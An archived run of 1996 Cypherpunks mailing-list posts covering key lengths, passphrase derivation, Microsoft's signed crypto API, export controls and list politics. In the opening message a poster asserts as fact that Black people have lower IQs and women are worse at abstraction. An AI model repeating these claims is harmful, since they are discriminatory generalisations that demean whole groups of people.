from inner-city Philly.  What I noticed about their failure to show up in
upper level math/science classes was that they had to spend too much time in
remedial classes to undo the damage done by city schools.

Considering the percentage of America's black population that lives in
urban areas, that seems to explain the lack of black representation.

Even more distressing on the whole was the lack of female students in
the Comp. Sci. department ... but that's another story.

As for the slang, I don't think it's going to attract white kids from
the suburbs either.  Screw the stereotypes, it's a little too close
to the "They could but they don't have the drive/will/intelligence" arguments
to say that Dilbert cartoons are going to turn off a "brother in the hood"
to math/science.  

Also, most of the Asian students at my school were not US citizens.  Most were
from China or Japan.

mark

- -- 
I wonder why you don't mention the fact that blacks on average have a lower i.q. than whites, while jews and Asians have a higher i.q. than (non-jewish) whites. If we talk about achievement in science, these facts seem rather important. 
And why is the lack of female students in the Comp.Sci. department distressing? It's what you can expect: on average, women are less talented than men in dealing with abstractions.

Bart

bart.croughs@tip.nl




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Wed, 10 Jul 1996 16:55:51 +0800
To: "'cypherpunks@toad.com>
Subject: FW: [RANT] Giving Mind Control Drugs to Children
Message-ID: <01BB6DE5.F2B1D660@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


Well, again my earlier message went out without my comments.  I think I've discovered a feature in MS Exchange:  true stego!   

Oh, well.  The gist of my comment was:

	As Tim said, the selective application of drugs or persecution regarding their use points to a great hypocrisy (and deterioration of character), and the more widespread the acceptance of hypocritical double-standards, the higher the rate-o-meter goes up in favor of statism.  At the very least, all the confusion surrounding drug use will create "disrespect for Authority" (which in turn will inspire statists to propose further crack-downs, pardon the pun, on "criminals").

	It makes me think of those Communist countries (remember them?) where political dissenters were been labelled insane - the protesters were the ones identified as having the problems, not the State.  The imprisoned troublemakers were then drugged, thus taking care of their "irrational" behavior and lack of appreciation.
......................................................................

Otherwise, replying to Perry, who remonstrated:

	Look, quit trying to tell people who have ADD that they 
	are in the wrong jobs, that they are unmotivated, that they 
	are "lazy", or whatever. Calling them "nuts" is actually far 
	better. It at least acknowledges that there is something wrong 
	that isn't readily fixed by the nostrums of people who have no 
	idea whatsoever what they are going through.

It's pretty easy to get caught up in a controversial thread like this one and begin to make all sorts of recommendations.  I realize it's not for me, a stranger removed from the life of one who suffers from something like ADD, to categorize and condemn them.
I was just presenting the example that sometimes problems are not what some people think they are, and therefore the solutions are not necessarily the best, either.    

But, this subject as Tim brought it up was concerning the relationship of drugs to society, hypocricy, and little helpless neighbor children (very controversial).  In regards to an individual's personal self-made choice to use drugs or other chemical substances on themselves,  what else could a cold, cruel, anarcho-capitalist libertarian type do but defer to their decision?

     ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <tphilp@bfree.on.ca>
Date: Wed, 10 Jul 1996 14:41:17 +0800
To: cypherpunks@toad.com
Subject: Giving Mind Control Drugs to Children (Last Word?)
Message-ID: <02143460700334@bfree.on.ca>
MIME-Version: 1.0
Content-Type: text/plain


I have been watching (ie deleting) all this stuff about children and drugs.
Personally, I think that if you leave children alone they will grow up and
decide what drugs of choice they want to use. (insert favourite recreational
drug here)

As for myself, I follow the "bunghole" (tm) theory of raising children. This
involves putting the child into a large barrel when they are born and
sealing up the barrel. Food, water, and air are given to the child through
the bunghole in the barrel. At the age of 18, you drive in the bung!

Sorry folks, I couldn't resist! <G>

Warmly, Tim Philp





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Wed, 10 Jul 1996 12:25:11 +0800
To: Mike Duvos <mpd@netcom.com>
Subject: [Complete Noise] Re: [RANT]
In-Reply-To: <199607090550.WAA28057@netcom14.netcom.com>
Message-ID: <Pine.BSF.3.91.960709221227.3264D-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> So the short, smelly, bald, big-footed people who can't do tensor 
> calculus tell me. :)

She was a three-of-five on the Duvos Scale if ever there was one, but it 
had been a long day at the office, and Bob was well into his third 
Martini ...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 10 Jul 1996 16:37:29 +0800
To: Wei Dai <weidai@eskimo.com>
Subject: Re: Contracts, Responsibilities, and Drug-Dispensing
Message-ID: <199607100517.WAA07051@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:33 PM 7/9/96 -0700, Wei Dai wrote:
>On Tue, 9 Jul 1996, Bill Frantz wrote:
>
>> ObCrypto: When may a minor child say no to PAK (Parental Access to Keys)?
>
>Interesting threat model... What can one do in the total absense of
>physical security?  We've talked about mental cryptography before, but I
>think we agreed that it isn't very practical.  Perhaps security through
>obscurity is a better solution here, since many parents are less computer
>literate than their children.

All the kids need to do is to put their secrets in a file named "README.TXT" 
and put it in the root directory!

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdirge@mail.concentric.net
Date: Wed, 10 Jul 1996 15:56:16 +0800
To: cypherpunks@toad.com
Subject: Junk E-Mail
Message-ID: <199607100403.VAA14293@dfw-ix11.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I know that this is off topic but..

How can I stop these idiot's sending me junk E-mail. I am posting 
this here because this group sounds like one of the only intelligent 
groups of people on the internet. Whatever mailing list I got on is 
sure working I am getting 2-3 junk e-mail's per day.

Thanks

Steve





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Erle Greer <erleg@sdinter.net>
Date: Wed, 10 Jul 1996 15:57:28 +0800
To: cypherpunks@toad.com
Subject: Re: Word lists for passphrases [vocabularypunks]
Message-ID: <2.2.32.19960710040559.006a6328@pop3.sdinter.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:18 PM 7/9/96 -0700, you wrote:
>>>>>> "Mark" == Mark M <markm@voicenet.com> writes:
>
>Mark> According to Altavista:
>
>Mark> nethermost   - 45
>Mark> insatiable   - 200
>Mark> insufferable - 200
>
>Mark> I know I have too much free time.
>
>According to Dejanews:
>  Individual word hit counts                                                 
>     * nethermost: 185
>     * insatiable: 1191
>     * insufferable: 752
>     * antidisestablishmentarianism: 142   :-)
>
>-- 
>steve@miranova.com baur
>Unsolicited commercial e-mail will be proofread for $250/hour.
>Andrea Seastrand: For your vote on the Telecom bill, I will vote for anyone
>except you in November.

Ok fellas, I am usually against senseless arguing.  Especially over a
subject that certain individuals shouldn't even had wasted the time to reply
to if they couldn't give a sh*t about it in the first place.  Therefore, I
assume that they are arguing JUST to argue, but they wait until a topic pops
up that they have some background in, therefore standing a chance of
winning.  Well, you already lost when you assumed that something worthwhile
or useful would come of your negative responses.  Oh, excuse me; you did get
replies to your responses, so I guess your investment did turn a profit.

Well, stooping even further into your realm, I too visited my trusty search
utility, MetaCrawler.  It too found all four of your words.  I decided to
pluck five odd-looking words from my MAINLIST.TXT produced by Word-List
Builder.  The list is COMPLETELY untouched or altered by human hands.  I ran
all five of them through MetaCrawler and your DejaNews (ultra list source)
and here are the results:

Word                 MetaCrawler DejaNews
-------------------- ----------- --------
DisplayWorkstationSe 0           0
SETUPPP              0           0
TmpDirPad            0           0
dsRegSetPads         0           0
TotalSwapReqdFromINF 0           0

(These words were all found in the first 1% of my list and then I got bored.)

Logic tells me that a word that can be found ANYWHERE with a
publicly-available search utility would not be the IDEAL passphrase to lock
up my secrets.

Well, now that I know where YOU will be assembling your list from, I can
rest assured to pull one from my list instead.

-fin





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 10 Jul 1996 17:10:38 +0800
To: "Mark M." <cypherpunks@toad.com
Subject: Re: A case for 2560 bit keys
Message-ID: <199607100607.XAA09583@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:38 PM 7/9/96 -0400, Mark M. wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>On Tue, 9 Jul 1996, jim bell wrote:
>
>> I don't think it's going to make a great deal of difference.  We've "all" 
>> shifted to 1024-bit keys, even though it's unlikely anybody will have the 
>> resources to crack them for decades if not centuries.  And the moment any 
>> government prosecutes anyone with information obtained by a decrypt of a 
>> 1024-bit key, the (then) stragglers will join the rest of us at 1500 or 
>> 2000+.  The government knows this and there's nothing it can do about it, 
>> except possibly for GAK and it isn't making much headway in that.
>
>Wiretaps aren't always used as evidence.  It's a very effective way to snoop
>on people under suspect and get some information on where some incriminating
>information may be, but they rarely produce hard evidence.

I'm well aware of that.  However, I think we will shortly be entering an era 
where wiretaps are useless, and it will not be considered worth the risk to 
do them illegally, because the probability of being able to decrypt them 
will be so low.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Ingle <inglem@adnetsol.com>
Date: Wed, 10 Jul 1996 17:42:18 +0800
To: cypherpunks@toad.com
Subject: Re: MSoft crypto API's
In-Reply-To: <199607100335.UAA01215@mail.pacifier.com>
Message-ID: <199607100645.XAA03352@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


It's even easier than that. Remember, signatures are detachable from the 
data. You import the software, MS signs it, you export the signature, and 
reattach it to the software.

						Mike

> Couldn't somebody IMPORT a piece of encryption software, have it signed by 
> Microsoft, then take the XOR of the signed and unsigned software and export 
> it?  (It's not a tool capable of encryption...)
> 
> Or:  Microsoft presumably has foreign branches, or at least it could easily 
> afford to set up one.  What's to stop Microsoft from signing foreign 
> encryption software outside of the US?  The software is never exported 
> (since it's already outside the country...), so there's no USA-law involv
> ement.
> Jim Bell
> jimbell@pacifier.com
> 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: support@vocaltec.com
Date: Wed, 10 Jul 1996 15:44:11 +0800
To: cypherpunks@toad.com
Subject: Setting up Internet wave
Message-ID: <199607100350.XAA24797@vocaltec.com>
MIME-Version: 1.0
Content-Type: text/plain


Dear Steve Cypherpunk,

Thank you for your interest in the Internet Wave technology from VocalTec.
As the Internet Wave is currently in beta-testing, we will keep you informed
about new releases of the server utilities and client application.
If you don't want to get such information, then send us an Email.

In order to get the Internet Wave Encoder utility and server CGI you
should follow these steps:

1. Go to the url http://www.vocaltec.com/server.htm
   (This is the same URL of the form you filled in order to get this
   Email reply)

2. Click the download reference.

3. You will be be asked for a username and password. enter:
	username: iwave
	password: 7365583

4. You will now start downloading the package.

5. Unzip the file, and read the readme.txt file for information on
   using the CGI utility and encoder.


Yours,

    VocalTec Staff.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz
Date: Wed, 10 Jul 1996 00:06:17 +0800
To: cypherpunks@toad.com
Subject: Re: Transforming variable- to fixed-length keys
Message-ID: <199607091229.AAA22215@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


>For iteration-0, CFB (or some other feedback mode)-encrypt the passphrase from
>the input buffer to the output buffer (assuming the library doesn't require
>that the plaintext and ciphertext be in the same buffer)
 
This doesn't work because the input and output buffer will almost always be of
different lengths.
 
>Questions: Are you using the previous chaining-variables/hash for each
>successive chunk?
 
No.  Each chunk is a new hash with <whatever>, where <whatever> defaults to
SHA1.  Since (for SHA1) 64 bytes of input affect each 20 bytes of output, I
don't think there's much need for chaining.  I'm trying to keep the
specification as simple and easy to check as possible (one of the problems with
the PGP data management was that it was rather complex and hard to follow.  I
suspect it would be difficult to implement a compatible version going only from
a written specification).
 
>How do you pad passphrases that are smaller than the minimum input for a hash
>function?
 
The input wraps, just like the output, so for example the letter "a" would be
hashed as:
 
 <length>a<length>a<length>a<length>a<length>a<length>a[...]
 
>Hash the user's input, prepended with a 0x00. Use this for the first 0..160
>bits of key. If more than 160 bits is needed, write over the 0x00 with 0x01.
>Hash again. This is much like your solution, but no wrapping. Note there is no
>problem truncating hash output.
 
That's another possibility.  The only thing here is that you're only changing
one byte for each pass, and I'm not sure if this is healthy.  I'll see what the
sci.crypt crowd (those who've survived the spamming) has to say about this - it
may actually be stronger than my increment-by-one method if you're worried
about related-key cryptanalysis.
 
Peter.
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Wed, 10 Jul 1996 16:39:18 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: A case for 2560 bit keys
Message-ID: <199607100502.BAA06102@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On  9 Jul 96 at 13:57, jim bell wrote:
[..]
> The most negative part of a long key is the false sense of security it may 
> engender in the weak-minded:  All key sizes are equally insecure from a 
> computer black-bag job or a specially-engineered virus.  If you're really 

Good point... but why limit false sense of security as to what
governments or corporations can do.  Poor passphrases, leaving
plaintext files around (perhaps not wiping them), and even having
incriminating conversations with folks on the 'net one doesn't know
under the belief that encryption makes it safe, etc. etc. are probably
more dangerous security holes.

Rob.
 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William Knowles <erehwon@c2.org>
Date: Wed, 10 Jul 1996 18:21:15 +0800
To: cypherpunks@toad.com
Subject: Privacy & Anonymous service providers?
In-Reply-To: <Pine.SUN.3.94.960706170917.28793A-100000@infinity.c2.net>
Message-ID: <Pine.SUN.3.94.960710004214.5433D-100000@infinity.c2.net>
MIME-Version: 1.0
Content-Type: text/plain


I'm working on a web page that would include a list of Internet
providers that offer anonymous accounts, or a better degree of
privacy not usually seen by regular providers.  Below is a list
I have been able to put together, I'm wondering if there is some
that I'm missing.  To avoid noise on the list, please reply 
via e-mail.
 
 
Community Connexion             http://www.c2.org
Paranoia                        http://www.paranoia.com
Panhandle Web Services          http://www.shellback.com
Data Haven Project              http://www.dhp.com
L0pht Heavy Industries          http://www.l0pht.com
Offshore Information Services   http://offshore.com.ai/
 
 
Thanks in advance!
 
 
William Knowles
erehwon@c2.org
 
 
--
William Knowles    <erehwon@c2.org>
PGP mail welcome & prefered / KeyID 1024/2C34BCF9
PGP Fingerprint 55 0C 78 3C C9 C4 44 DE   5A 3C B4 60 9C 00 FB BD
Finger for public key
--






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 10 Jul 1996 19:51:16 +0800
To: cypherpunks@toad.com
Subject: The Nature of the Cypherpunks Community and List
Message-ID: <ae08b00116021004aa01@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:11 AM 7/10/96, Black Unicorn wrote:

>I wasn't touting conspiracy theories, just making what I thought was an
>amusing observation.
>
>My apologies to Mr. Duvos.  I didn't at all mean to suggest he was in any
>way responsible for this silliness, rather to point out the degree to
>which the conversation has sunk into the sewer.

Please, Unicorn, people here are talking about what interests them, as
directly demonstrated by the generation of articles and followups. If they
were _more_ interested in discussing the IETF, or SFS, or Triple DES, for
example, they _would_. (And at times they do, of course. All things have
their times, and threads ebb and flow.)

And, Unicorn, I recall you yourself generating several *dozen* long rants
regarding Jim Bell, just a few months ago...

I suggest to all people who claim that the list has become "sewerpunks"
that the best way to change the focus of the list is to write essays which
generate responses (as you did, Unicorn, several days ago in your excellent
"What remains to be done" piece). Leading by example, as opposed to
"leading by kvetching."

It happens that I like to write essays, more so than to just add simple
one-line comments, and it happens that some of my essays have triggered a
lot of messages (recently, for example, the "Net and Terrorism," and "Mind
Control Drugs" threads were started by my articles). If people, on the
whole, would rather discuss _other_ topics, then....then they _would_. A
simple concept.

Railing against the interests people have is rarely effective. And
claiming, as some do, that the "purpose" of the list is to discuss
primarily the latest advances in cryptology is mis-stating the nature of
the list. While there is no point in debating formal charters, people
discuss what they think is important. Natural corrective forces tend to
stop the discussion from getting too far afield. I cannot imagine someone
writing about UFOs getting much response, but that so many people have
thoughts on the "Ritalin" issue (and the role of the government schools in
supporting the doping of students) indicates it is within the envelope of
topics Cypherpunks think important.

Perry has several times threatened to form his own list, where "real
cryptography" will be the only topic allowed. I urge him to follow his
bliss. And other lists have had other foci, including the "Coderpunks"
list, which *is* explicitly about cryptography only. (Is the Coderpunks
list still active? I haven't heard anyone here mention it in a long time.)
And sci.crypt, sci.crypt.research, and dozens of security- and PGP-related
newsgroups are still flourishing.

The Cypherpunks folks started meeting in the summer of 1992, and our focus
was and remains on a wide spectrum of topics related to crypto-privacy,
politics of cryptography, PGP, anonymous remailers, and a bunch of related
themes. It *never* was a list devoted solely to pure cryptography; plenty
of academic and professional forums already serve that market--IACR/Journal
of Cryptology, Crypto, Eurocrypt, Asiacrypt, sci.crypt.*, various other
mailing lists, etc.

Our focus was always on the more "outre" aspects, the frontiers not often
dealt with in the academic journals. (Not that we are better
mathematicians, though many on this list are world-class, but because our
political focus informs our choice of topics to pursue. That is, we were
the first group to look seriously at anonymous remailers (in terms of
implementing Chaum's ideas), the first to really fool around with digital
cash in a real world environment outside the lab (MagicMoney), and we have
explored black information markets, offshore data havens, and so on. I
don't think any of the "academic" groups, distinguished as they are, have
made the kinds of demonstrations we have in some areas.

(Perry will probably disagree, calling us all a bunch of pikers and
deadbeats, as he has in the past, and claiming that the only "good"
Cypherpunks were Matt Blaze and Steve Bellovin, both of whom he claims were
"driven off the list" by people like me. Well, people join and leave lists
for all sorts of reasons. Regardless, our list is what it is. If Perry
thinks we're such worthless leeches and incompetents, he should create a
mailing list more to his liking. Seems fair to me.)

It is hardly surprising, nor inappropriate, that we "stray" from core
topics. After all, some topics are "worn out" at any given time. I don't
think the 8th cycle of discussions about cracking DES or the 13th cycle of
debates about NSA surveillance is any more useful than the discussions some
object to (but, interestingly, some of the most vocal critics of threads
being "off-topic" end up writing the greatest number of posts on that topic
:-}).

In any case, people can learn to use killfiles to filter out entire
threads, or the posts of people they dislike reading.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Wed, 10 Jul 1996 14:09:26 +0800
To: cypherpunks@toad.com
Subject: Re: Advances in Quantum crypto
Message-ID: <199607100137.BAA24375@pipe5.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jul 09, 1996 20:30:11, '"Mark M." <markm@voicenet.com>' wrote: 
 
>On Tue, 9 Jul 1996, Derek Bell wrote: 
> 
>> I see some Australian researchers have made an advance in quantum 
>> crypto. 
> 
>What kinds of advances?  Last I heard, British Telecom was using quantum 
>crypto on 10 kilometer fiber optic cables. 
 
 
Yes, Derek and Mark, provide more detail, maybe source citations, on both
these references, if you have them handy. 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Abelson <hal@martigny.ai.mit.edu>
Date: Wed, 10 Jul 1996 17:30:04 +0800
To: cypherpunks@toad.com
Subject: MIT harassed over publication of PGP book
Message-ID: <m0udsPo-000G1BC@htp.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


The following message is written on my own behalf; it is not an
official statement of MIT.

Over the past few weeks, MIT has been negotiating a research framework
agreement with Sandia Labs.  A framework agreement does not fund any
particular piece of research.  Rather it establishes policies and
procedures under which future research will be funded and carried out.
This saves MIT and Sandia the trouble of working out a separate
agreement for each new contract.  We have several such agreements in
place with various organizations.  Sandia has also set up agreements
with universities in the past, and is currently setting then up with
several more universities, including MIT.

In the current round of negotiations, Sandia is requesting to add
language to the agreement, giving them right of prior review over any
publications arising from their sponsored research at MIT, in order
that Sandia can review these for possible violation of US export
control regulations.

When our contract people queried this, they were put in touch with
Bruce Winchell, a Sandia lawyer.  Winchell told them that the State
Department had "made it clear" to DOE that the Department was very
concerned that "MIT did not have procedures in place to monitor the
dissemination of material that is subject to export controls."
Winchell went on to say that a recent MIT publication by "a Philip
Zimmermann" came very close to violating export control laws.

As far as we know, Sandia has not been discussing such a clause with
other universities with which it is negotiating contracts.

I assume that Mr. Winchell's comment above refers to the publication
of the PGP source code book by MIT Press.  Before publishing the PGP
book, the Press wrote the State Department, informing them of our
intent to publish the PGP book and giving them the opportunity to let
us know if they thought this would raise an export control problem.
We never received a response.  Since publication, MIT has never (to my
knowledge) heard from State that they had any objection to the PGP
publication.

Now, we learn of a back channel communication from State to DOE to
Sandia, which has prompted Sandia to want to act as a policeman for
MIT vis a vis export controls.

This is troubling for what it says about how the State Department is
dealing with export issues surrounding information about cryptography,
and about the extent to which policies are being administered in a
clear and above-board manner.

Hal Abelson
Prof. of Comp. Sci. and Eng.
MIT



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAwUBMeNIKviGKLV9Y6XFAQFeRwP6ArPEyMTY3IgfuAQGcCCfmbuc5D/505N/
+x/9hhVZOIv33sEummQ5UtJeSAyH9gLg0GMOxKCpQOqsBsed5YAO9xVRjIW3dXfQ
Xgo975qFHHmlRA3cxa5EZFg7Q/39V3QVKlCrcZ8jyYW9ECgNJtbMSvcvaO3Qzgom
lgo4OB6g7eo=
=QABK
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 10 Jul 1996 17:13:28 +0800
To: Mike Duvos <mpd@netcom.com>
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <199607091945.MAA21866@netcom14.netcom.com>
Message-ID: <Pine.SUN.3.94.960710021014.1111B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 9 Jul 1996, Mike Duvos wrote:

> Black Unicorn <unicorn@schloss.li> writes:
> 
>  > I keep looking around wondering if the list is being
>  > trolled.  (Anyone else notice Mr. Duvos' username is "mpd"?)
> 
> Pretty obvious it's my initials, as opposed to one of the other
> thousand or so acronyms it collides with.

I wasn't touting conspiracy theories, just making what I thought was an
amusing observation.

My apologies to Mr. Duvos.  I didn't at all mean to suggest he was in any
way responsible for this silliness, rather to point out the degree to
which the conversation has sunk into the sewer.

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 10 Jul 1996 18:33:33 +0800
To: George Kuzmowycz <gkuzmo@ix.netcom.com>
Subject: Re: MSoft crypto API's
In-Reply-To: <199607092319.QAA00934@dfw-ix2.ix.netcom.com>
Message-ID: <Pine.SUN.3.94.960710031550.1856B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 9 Jul 1996, George Kuzmowycz wrote:

[...]

> "  Microsoft's Crypto APIs will be available to third-party vendors
> writing applications with embedded security. But the hardware or
> software Crypto-engines for these applications will need to be
> digitally signed by Microsoft before they will work with the APIs.
> Under an unusual arrangement with the NSA, Microsoft will act as a
> front man for the powerful U.S. spy agency, checking on whether the
> vendors' products comply with U.S. export rules."
> 
>   I was a bit surprised not to see any discussion of this here. Is it 
> just old news? Or maybe people here don't read Network World?

[...]

>   An MS/NSA alliance?
> 
>         -gk-

This is a very deft and sly move, if it was indeed planned, by the NSA.

Clearly they have got the message.  Political efforts to curtail crypto
are doomed to failure.  Economic strangulation is the way to go.

Well here you are folks, months of bitching about how stupid the NSA must
be has paid off.  Not only is this clever, its insidious.

1. It's too difficult for Joe Sixpack to understand.
2. It preys on the market leader already, rather than attempting to
bootstrap (as with clipper).
3. It uses as its implementation a private, rather than a public entity.

Now this strikes me as something truely frightening.  The NSA has become
an intelligence agency which is effectively working in concert with
private interests to conduct internal security operations by proxy.

And what has microsoft gained?  Nothing.  They are still subject to export
laws, they even have to kiss NSA ass more now less their little bit of
largess be yanked away from them.

While in past using a corporation such as E-Systems as a front and a
constitutional end around was expected, this is the pre-empting of a major
pre-existing entity.  Does not bode well.

Netscape, are you listening?  You are being battered around in the press
and on the market as being a flash in the pan.  Yes, you got there first,
but you are now giving it up to MicroSoft, or so say the writers.

I was brutal and hard on you on this list for a reason before, and that
was because the above was my fear.

Netscape, are you listening?

Now would be a good time to announce that you are not working for the NSA
like some other companies.

God, I wish someone in Netscape PR would wake the hell up.

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Wed, 10 Jul 1996 19:15:56 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: MSoft crypto API's
Message-ID: <199607100906.FAA27981@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On  9 Jul 96 at 20:34, jim bell wrote:
[..]
> Unexplained:   What if the program Microsoft is asked to sign is not 
> intended for export?  Presumably, NSA has no authority, then, and thus 

They could insist on only signing exportable software, and in theory 
use that as ITAR-relaxing leverage.

Methinks it's a bad move to only have MS sign software... presumably 
they won't outright refuse to sign competitors software.  It would be 
a conflict of interest for them not to... very usable as evidence 
against MS in an anti-trust suit.  Independent CA's would be better.

IMO, it gives a false sense of sucurity to even require crypto apps 
to be signed.  A lot of folks would want a developer's kit (probably 
cost $$$) to get around that requirement... nice loophole, BTW, for 
those that can afford it.  Or until somebody patches the code to 
ignore bad signatures of lack of them and releases the patch.

Oh yeah... false sense of security in that if an app is signed, it 
must be secure.  Will the new Windows wipe all temporary files and 
the swap file?  Otherwise it makes a CryptoAPI meaningless.

There'll be a problem with PGPlib as well... what if people want to 
compile their own version?  Assuming MS will even sign it... that 
will be a quagmire.  It's likely that if strong crypto is not 
implemented in the MS API (or it is done so in an insecure fashion), 
hardly anyone will use it.

> presumably Microsoft shouldn't be able to refuse to sign anything they're 
> asked.

Why? Assuming there were no export restrictions... if it's signed by 
MS, people will take it to mean that MS is vouching for it.  If they 
sign a library that does 'naughty things' or is an incredibly 
incompetant implementation of an algorithm, it could turn out to be 
bad PR for them.  (Hm... they could use this as an excuse to read 
competitor's source code.)

[..]
> Couldn't somebody IMPORT a piece of encryption software, have it signed by 
> Microsoft, then take the XOR of the signed and unsigned software and export 
> it?  (It's not a tool capable of encryption...)

Under that logic, I could do the same to a PGP distribution.  I doubt 
the state department would look at it that way, or a jury for that 
matter.  If you want to risk a few years in Federal Prison, go 
ahead... though chances are crypto-apps seem to make it out of the 
country anyway...

 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Wed, 10 Jul 1996 20:04:37 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Another bad idea
Message-ID: <199607100922.FAA28054@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On  9 Jul 96 at 18:26, E. ALLEN SMITH wrote:
[..]
> 	Like China, various other countries are trying to get the Internet's
> benefits (such as technical information) without its other consequences
> (extension of civil liberties into countries that want to deny them). One idea
> that I've had for preventing such problems is to look for addresses from such
> countries that are posting to technical newsgroups, to technical mailing lists,
> or that are attempting to get access to web pages on technical subjects (which
> access they will hopefully be denied, although an alternate possibility). Then
> mail information to those addresses that those countries don't want getting
> into their countries, such as on human rights abuses (or well-written
> pornography...). One interesting (and somewhat cypherpunk) matter in this is

Great idea. Get some (possibly) innocent techie in an oppressive 
country thrown in jail or executed.  Or perhaps s/he gets offended, 
contributing to the notion that all Westerners are evil perverts 
out to corrupt them.
[..]
> 	An extension of this for web sites, which I understand as possible
> but difficult, would be to swap anyone from such a country trying to get access
> to a technical web site to instead receive "subversive" information or
> pictures. (The pornography mentioned above would probably be more effective in
> picture format; other pictures might include information on human rights
> abuses).

Damn aggrevating for that user, and it could get him/her in trouble.

On a wide-scale it could provoke responses from those countries.  
Imagine this list being bombarded with propaganda, or perhaps 
somebody here looking at an anti-censorship web page getting 
pro-censorship messages from religious fundamentalists.

Or it could encourage them to use special firewalls which filter 
content and disallow graphics... (probably many US-based companies 
would be all-too-happy to sell them the software to do it), or even 
close themselves off from the Internet altogether, perhaps form 
separate, unconnected Family/Islamic/Chinese-values networks.

Rob



 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Wed, 10 Jul 1996 17:39:23 +0800
To: cypherpunks@toad.com
Subject: Re: Contracts, Responsibilities, and Drug-Dispensing
In-Reply-To: <199607092212.PAA15529@netcom7.netcom.com>
Message-ID: <Pine.LNX.3.94.960710063326.2225A-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 9 Jul 1996, Bill Frantz wrote:

